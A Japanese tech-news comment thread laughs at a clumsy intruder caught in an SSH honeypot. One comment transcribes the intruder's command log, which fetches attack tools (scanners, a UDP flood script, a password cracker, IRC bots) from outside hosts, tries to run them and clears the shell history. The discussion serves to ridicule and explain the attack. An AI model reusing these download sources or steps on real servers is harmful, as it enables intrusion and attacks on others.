パスワードを忘れた? アカウント作成
295736 story
セキュリティ

イケてないハッカー、その所業を晒される 59

ストーリー by reo
昼食時の腹筋セキュリティに警告が 部門より

ある Anonymous Coward 曰く、

本家 /. 記事にて、ハッカー攻撃のログ動画がタレこまれている。

本家タレコミ人はハニーポットを設置しており、ハッカーはこれにまんまと引っかかったとのこと。そのイケてなさぶりがあまりに可笑しく、動画を YouTube に公開しようと思い立ったそうだ。

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • 右のハッカーが (スコア:5, おもしろおかしい)

    by Anonymous Coward on 2011年02月04日 12時34分 (#1898412)
    いまいちイケてない(萌えない)理由を3つあげなさい。
    • Re:右のハッカーが (スコア:5, おもしろおかしい)

      by reo (4042) on 2011年02月04日 13時01分 (#1898434) 日記
      1. root 権限を得ていてもなお sudo をしちゃうあたりところとか、展開した後の tar ファイルはちゃんと (rf オプションまでつけて) 消去しちゃうあたりににじみ出る育ちの良さが、アウトローになりたい彼女の望みとの間に齟齬を発生させてハラハラさせられてしまう。
      2. tar で展開したら /var/spool/samba に展開されるものだと思い込んじゃっているのかもしれない天然っぷりを持つが、その誤解を自力で解決するカタルシスを観客に与えるものの (あるいはがむしゃらにしているだけかもしれないのだが、そこがまた可愛い) 既に cd /var/ してしまった後だったという「ああーっ」感で観客の心が一つに。
      3. 自暴自棄になった彼女が後半、続けざまにあちこちからツールをダウンロードするが、そのほとんどで 403 を返されるあたりには胸が厚くなる (薄い方が好みかもしれないが) 。

      ぽかぽかする ? 萌えているの、わたし ?

      --
      Hiroki (REO) Kashiwazaki
      親コメント
      • Re:右のハッカーが (スコア:2, おもしろおかしい)

        by flutist (16098) on 2011年02月04日 13時12分 (#1898438)

        ごく普通の unix 的な操作をこれほど分かってない人が、クラッキングをコマンドラインでやろうとする、その挑戦者なスピリットに萌えました。

        #「彼女」なの?

        親コメント
        • Re:右のハッカーが (スコア:3, おもしろおかしい)

          by Anonymous Coward on 2011年02月04日 13時33分 (#1898450)

          元ネタにかけているのではないかと

          # ああかけるってそういう…

          親コメント
          • ぶっ (スコア:1, おもしろおかしい)

            by Anonymous Coward on 2011年02月04日 16時47分 (#1898553)

            かけるのはネタじゃなくてタネですね

            #流れで言ってみただけです
            #すみませんすみません

            親コメント
        • by Anonymous Coward
          侵入者がtypoしてたり、必死にperlを動かそうとしてたりするあたりが面白いですよね。

          ああいうのをスクリプトキディと呼ぶのでしょうか
      • by Anonymous Coward

        reoさん、彼女って性別を特定した理由がしりたいよ、僕
        いや割とマジで
        #うちのハニーポットの記録はみな男っぽいのが鬱だ orz

        • Re:右のハッカーが (スコア:5, おもしろおかしい)

          by reo (4042) on 2011年02月04日 13時42分 (#1898458) 日記

          このハッカー (ハッカーという言葉の使い方については別スレで) がダウンロードしている ruby のパッチレベルをご覧ください。この侵入が行われたのは 2011/1/20、ruby は p330 が既にリリースされているのにも関わらず、彼女は執拗に何度も p72 をダウンロードしようとしています。

          これは、このハッカーの婉曲的な自己顕示欲の現れであることに疑問を挟む余地はありません。p72、π72、つまり如月千早か高槻やよいのどちらかであるということであり、やよいは自分のバストサイズに対して意識的ではありませんから、このハッカーは如月千早、その人であることが明らかなのです。

          な、なんだってー (AA略) 。

          --
          Hiroki (REO) Kashiwazaki
          親コメント
        • Re:右のハッカーが (スコア:1, おもしろおかしい)

          by Anonymous Coward on 2011年02月04日 13時39分 (#1898457)
          「イケてないハッカー」は仏語では女性名詞なのです。
          親コメント
        •  流れとは関係なく、”鬱だsudo(すどー)"というダジャレを思いついて仕方がない。

           それにしても、なんで/var/spool/samba/にファイルが出来てると思い込むのかようわからん
          (ああ、こういうのに萌えればいいのか…)
          --
          #Insanely great!
          #をかのゆ
          親コメント
        • by guicho2.71828 (38877) on 2011年02月04日 17時14分 (#1898566)

          音楽の元ネタ故かと…

          Portal: Still AliveよりGLaDOS [wikipedia.org]

          Hello, and, again, welcome to the Apature science and computer aided enrichment center ...

          --
          新人。プログラマレベルをポケモンで言うと、コラッタぐらい
          親コメント
      • by Anonymous Coward
        散々ディレクトリ移動に失敗した所為か ls -a, cd udp あたりで少し慎重に
        コマンド入力しているところとか、最後の最後に history -c だけはちゃんと
        やっていくあたりも少し萌えた。
    • Re:右のハッカーが (スコア:3, おもしろおかしい)

      by taka2 (14791) on 2011年02月04日 13時31分 (#1898448) ホームページ 日記

      一通りの操作がダメだったあと、また最初に戻って「sudo apt-get ruby」→「sudo: command not found」からrubyのソースのダウンロードという、
      まったく同じコマンド操作を再チャレンジしてるあたりとか。

      「wget ftp:// [ftp]…/ruby-1.8.7-p72.tar.gz」で、「Unsupported scheme」エラーになったのに、続けて
      「cd ruby-1.8.7-p72」 →No such file or directory
      「tar xzvf ruby-1.8.7-p72.tar.gz」→No such file or directory
      という謎な順番でコマンドを打つあたりとか。

      ホームディレクトリに a/go.sh を展開したのに、
      必死になって /var/spool/samba/a ってディレクトリを何度も何度も探しにいったあげく、
      /var/spool で ./go.sh を実行して 「./go.sh: command not found」って言われてるとか。

      perlスクリプト(udp.pl)をダウンロードした後で
      「perl udp.pl」→ perl: command not found になったのに、
      再度スクリプトをダウンロードしなおしてみたり、「chmod +x *」してみたり「./udp.pl」してみたりとか

      あ、4つになっちゃった。

      ファイルのダウンロードが404になった時に、ネットワーク接続の確認のために、マイクロソフトからW2Ksp3.exe をダウンロードしてみてるあたりは萌えポイントかも

      親コメント
      • by ddc (14170) on 2011年02月04日 14時11分 (#1898481) 日記

        > ホームディレクトリに a/go.sh を展開したのに、
        > 必死になって /var/spool/samba/a ってディレクトリを何度も何度も探しにいったあげく、
        > /var/spool で ./go.sh を実行して 「./go.sh: command not found」って言われてるとか。

        動画見てて、ここで爆笑してしまいましたw
        ところでwin2ksp3.exeをダウンロードした理由は何だったんだろう…

        親コメント
        • by n_ayase (36873) on 2011年02月04日 15時11分 (#1898522) ホームページ 日記

          天然な人にコンソール操作させると偶にとんでもないことしでかす、とは知り合いがよく言いますが。
          本当に何でなんでしょうねぇ。

          --
          神社でC#.NET
          親コメント
        • by denchu (6847) on 2011年02月04日 15時18分 (#1898525)

          ところでwin2ksp3.exeをダウンロードした理由は何だったんだろう…

          ファイルがダウンロード出来ているかどうか(もしくは wget が動作しているかどうか)確認したかったんでしょうかね?

          後は想像ですが、マニュアル見たいのが手元にあって順番にコマンドを発行しているだけとか…

          親コメント
          • by Anonymous Coward

            本当にあれが最大の謎だ
            なにかしていないとたまらない病気の一種なんだろうか

        • by Anonymous Coward
          > ホームディレクトリに a/go.sh を展開したのに、
          > 必死になって /var/spool/samba/a ってディレクトリを何度も何度も探しにいったあげく、
          > /var/spool で ./go.sh を実行して 「./go.sh: command not found」って言われてるとか。

          私もここが壺でした。笑いすぎて腹が痛い、、、、
          なんか、久々に笑った気が。
          ネタにしてもセンスが良すぎるし。

          ハニーポット、凄く巧妙な手口を観測して研究する所でこんなの見たら、
          「何しにきた、というか、何がしたいんだ、おまえは」と晒したくなるよね。
          ある意味、凄い人である事に違いないけど。
    • by Anonymous Coward on 2011年02月04日 17時19分 (#1898570)

      元ネタ分かってない人が多そうなので、野暮を承知で
      「右のキャラが、いまいち萌えない理由を3つあげなさい」 [itmedia.co.jp]

      個人的には
      ・色のアクセントがない。
      ・立体が意識できておらず、顔および足のバランスが悪い。
      ・オリジナリティがない。
      を挙げたいです。

      親コメント
      • by Anonymous Coward

        > ・色のアクセントがない。
        > ・立体が意識できておらず、顔および足のバランスが悪い。
        > ・オリジナリティがない。

        このクラッカーのなり損ないがですか?

    • by Anonymous Coward
      動画見てもよくわからなかったんで、マジで3つ挙げてほしいな。

      #先こされたー
    • by Anonymous Coward

      イケてないけど萌えます!

    • by Anonymous Coward

      沢山ありすぎて、この余白には書ききれない。

  • コマンド一覧 (スコア:5, 参考になる)

    by Anonymous Coward on 2011年02月04日 13時46分 (#1898462)
    w
    wget
        <-- パラメータ未指定のため Usage 表示
    wget http://fakehids.com/fakehids32.tar.gz
    sudo apt-get install ruby1.8 libopenssl-ruby1.8
        <-- sudo: command not found
    wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz
        <-- Unsupported scheme.
    ls -a
    wget http://203.128.7.10/~admin/ka.tar
    tar xvf ka.tar
    rm -rf ka.tar
    cd /var/spool/samba/a
        <-- No such file or directory
    cd /var/spool/samba
        <-- No such file or directory
    cd /var
    cd /spool
        <-- No such file or directory
    cd /samba
        <-- No such file or directory
    cd /a
        <-- No such file or directory
    cd a
        <-- No such file or directory
    cd spool
    cd samba
        <-- No such file or directory
    cd a
        <-- No such file or directory
    chmod +x *
    ./go.sh 92
        <-- ./go.sh: command not found
    wget http://203.128.7.10/admin/udppl.tar
    tar xvf udppl.tar
    chmod +x *
    perl udp.pl
        <-- perl: command not found
    wget http://203.128.7.10/~admin/k08.tgz
        <-- 404 Not Found
    cd udp
    perl
        <-- perl: command not found
    udp.pl
        <-- udp.pl: command not found
    wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
    wget http://203.128.7.10/admin/k08.tar.gz
        <-- 404 Not Found
    wget http://203.128.7.10/admin/udppl.tar
    tar xvf udppl.tar
    ls -a
    cd udp
    chmod +x *
    perl udp.pl
        <-- perl: command not found
    wget http://203.128.7.10/~admin/ka.tar
    tar xvf ka.tar
    rm -rf ka.tar
    213.248.54.246
        <-- 213.248.54.246: command not found
    cd /var/spool/samba
        <-- No such file or directory
    cd /var/spool/samba/a
        <-- No such file or directory
    cd /var/spool
    cd samba
        <-- No such file or directory
    cd ". "
        <-- No such file or directory
    cd a
        <-- No such file or directory
    cd /a
        <-- No such file or directory
    ifconfig
    cd /var/spool/samba
        <-- No such file or directory
    wget http://fakehids.com/fakehids64.tar.gz
    sudo apt-get install ruby1.8 libopenssl-ruby1.8
        <-- sudo: command not found
    wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz
        <-- Unsupported scheme.
    cd ruby-1.8.7-p72
        <-- No such file or directory
    tar xzvf ruby-1.8.7-p72.tar.gz
        <-- No such file or directory
    ls -a
    perl
        <-- perl: command not found
    wget ely.uv.ro/scan.tar.gz
        <-- 403 Forbidden
    wget ely.uv.ro/john.tar.gz
        <-- 403 Forbidden
    wget http://bodylanguage.uv.ro/unixcod.tar.gz
        <-- 403 Forbidden
    wget www.shoarec.go.ro/udp.pl
    wget ely.uv.ro/emech.tar.gz
        <-- 403 Forbidden
    wget ely.uv.ro/emech.tar.gz
        <-- 403 Forbidden
    wget ely.uv.ro/radiobsd.tar.gz
        <-- 403 Forbidden
    wget ely.uv.ro/radiobsd.tar.gz
        <-- 403 Forbidden
    history -c
    exit
    • コマンド他解説 (スコア:5, 参考になる)

      by Anonymous Coward on 2011年02月04日 14時57分 (#1898506)
      • w
        • 現在の稼働状況。システム負荷のほか、ログインしているユーザが表示される。現在root(通常管理者アカウント)一人(すなわち自分)。
      • wget
        • ファイルをダウンロードするコマンドの定番
      • sudo ~
        • 管理者権限でコマンドを実行するコマンド
      • apt-get install ~
        • ソフトをインストールするコマンド
      • ruby1.8 libopenssl~
        • スクリプト言語ruby本体とライブラリ
      • ls -a
        • 現在のディレクトリ(カレントディレクトリ)のファイルやディレクトリ(フォルダ)をすべて表示
      • www2:~#
        • www2はホスト名、:から#までの間はカレントディレクトリ。~はホームディレクトリを表す。
      • wget ftp://ftp.ruby-lang.org/ [ruby-lang.org]~
        • ruby-lang.orgはrubyのソースコードを配布している
      • Unsupported scheme
        • サポートしてない(使えない)scheme(URLの頭のhttpとかftpとか)。wgetは通常ftpもサポートしている。通常ならば。
      • tar xzf ~
        • 圧縮ファイルの展開コマンド。ファイルやディレクトリは現在のディレクトリに展開される。
      • rm -rf
        • ファイル削除
      • cd ~
        • カレントディレクトリ(現在いるディレクトリ)の移動、頭に"/"が付くとルートディレクトリからの絶対パス、つかないと現在のディレクトリからの相対パス、wget並みに愛されている。
      • samba
        • Windowsとのファイル共有をするソフトの名前
      • a
        • この人が tar xzf ~ で展開したディレクトリ。ただしそれはホームディレクトリ。今は /var とか /var/spool とか。
      • chmod +x *
        • 現在のディレクトリのにあるすべてのファイルに実行権限を付加する。そこにどんなファイルがあるか知らないが。
      • ./go.sh 92
        • 現在のディレクトリのgo.shファイルを実行する(あれば)。さっき実行権限を付加したので実行できるはず(あれば)。さっき展開したファイルの中にはたしかにgo.shがある(さっきのディレクトリであれば)。
      • chmod +x *
        • 現在のディレクトリのにあるすべてのファイルに実行権限を付加する。子ディレクトリは含まないが。
      • perl
        • 普通のunix/linuxだと大概あるスクリプト言語。普通ならば。
      • www2:/var/spool/~#
        • www2はホスト名、:から#までの間はカレントディレクトリ。大事なことなので2回言いました。
      • tar xzf ~
        • 圧縮ファイルの展開コマンド。ファイルやディレクトリは現在のディレクトリに展開される。大事なことなので(略
      • ifconfig
        • ネットワーク接続の設定状況の表示と設定
      • sudo ~
        • 管理者権限でコマンドを実行するコマンド。ところであなたは誰ですか?
      • history -c
        • コマンド履歴を消す
      親コメント
      • by Anonymous Coward on 2011年02月04日 17時41分 (#1898580)
        最終的に作りっぱなしでほったらかされたファイル/ディレクトリ一覧.

        ~/fakehids32.tar.gz
        ~/a/
        ~/a/*
        /var/spool/udppl.tar
        /var/spool/udp/
        /var/spool/udp/udp.pl
        /var/spool/udp/W2Ksp3.exe
        /var/spool/udp/udppl.tar
        /var/spool/udp/udp/
        /var/spool/udp/udp/udp.pl
        /var/spool/udp/udp/a/
        /var/spool/udp/udp/a/*
        /var/spool/fakehids64.tar.gz
        /var/spool/udp.pl
        親コメント
  • 本家を見てわかったんだけどkippoっていうハニーポット・パッケージ
    http://code.google.com/p/kippo/
    があって、それを使うとこういうログが取れるんだね。
    --
    love && peace && free_software
    t-nissie
  • ハッカー攻撃、ハッカー攻撃、ハッカー攻撃…。

  • 三流クラッカーは、ルビーを使いたがるのか?
  • おろかなハッカーの記録 (スコア:2, おもしろおかしい)

    by Anonymous Coward on 2011年02月04日 15時48分 (#1898535)

    ここまででおろかなハッカーの記録 [cocolog-nifty.com]を挙げる人がいないとは

  • by Anonymous Coward on 2011年02月04日 12時37分 (#1898415)

    PortalというゲームのStill aliveという音楽です。

    • by t-nissie (8647) on 2011年02月04日 20時36分 (#1898646) ホームページ 日記
      このPortalってゲームはなんか1つの文化圏みたいなものを築いているんだ
      http://en.wikipedia.org/wiki/Portal_%28video_game%29

      本家ではxkcdへのリンクがあった
      http://xkcd.com/606/

      iPhoneでPortalSoundsってアプリを買ってみた
      ゲームの効果音が出せる
      この曲のビデオも見られる
      --
      love && peace && free_software
      t-nissie
      親コメント
  • 管理者のYouTube ID晒させる為の
  • by Anonymous Coward on 2011年02月04日 12時46分 (#1898428)

    >本家タレコミ人はハニーポットを設置しており、ハッカーはこれにまんまと引っかかったとのこと。
    んな事しなくとも自分でWeb上に公開している人たちは多々いるじゃないか。
    晒し者にされていると思ったらせめて削除しろよ、と思ったページに当たったのは1度や2度じゃないだろ?

  • by Anonymous Coward on 2011年02月04日 13時42分 (#1898459)
    足跡を消したりはしないのかな?

    wtmp、utmpとかlastlogとか各ファイルのタイムスタンプとかを
    一切考慮していない様な気がする。

    一応、履歴は消去している?
  • by Anonymous Coward on 2011年02月04日 13時46分 (#1898463)
    新入社員が、新しいデーモンを立ち上げようと、慣れないコマンドラインに四苦八苦してる様に似てて笑った。
  • by Anonymous Coward on 2011年02月04日 14時37分 (#1898496)
    確かに面白い。
    けど悪趣味な感じ。
    • by mishima (737) on 2011年02月04日 15時09分 (#1898517) ホームページ 日記

      うちは業務でUnixサーバを他部門に提供してるけど、
      端末上の全操作ログを保管しているなぁ。

      作業ミス発生時に「どんなポカやらかしたか見せて!」とか言われて再生すると、
      まさにこんな感じのログが残ってたりして、みんなでニヨニヨしたりする。面白いけど悪趣味。

      --
      # mishimaは本田透先生を熱烈に応援しています
      親コメント
  • by Anonymous Coward on 2011年02月04日 16時00分 (#1898542)

    wget でftpサイトからダウンロードしようとして "Unsupported scheme." と怒られてたけど、
    ソースをいじらずに無効にする方法ってあったかしら。

typodupeerror

吾輩はリファレンスである。名前はまだ無い -- perlの中の人

読み込み中...